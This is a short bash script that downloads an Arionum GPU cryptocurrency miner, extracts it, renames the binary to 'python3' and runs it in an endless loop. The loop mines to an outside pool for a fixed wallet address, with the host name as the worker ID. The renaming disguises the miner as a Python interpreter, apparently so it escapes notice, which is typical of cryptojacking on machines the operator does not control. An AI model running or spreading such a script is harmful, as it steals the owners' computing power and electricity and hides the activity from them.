#!/bin/bash  
apt install libcpprest -y
wget https://bitbucket.org/cryptogone/arionum-gpu-miner/downloads/arionum-gpu-miner-v1.6.0-alpha-ubuntu18-cuda9.1.tar.gz
tar xvzf arionum-gpu-miner-v1.6.0-alpha-ubuntu18-cuda9.1.tar.gz
mv arionum-cuda-miner python3 && chmod +x python3

while (true) ; do ./python3 -u  -b 512 -t 1 -p http://mine.arionumpool.com:80 -a C5tkic7wXWtyk4YfZoF7f9GWANTk8FjBAGreLcHooMqfdHogm1F3tGTErDdio9njdpaLMtPxdMXswJk6NVvpkqE -i $(hostname) ; sleep 10 ;done
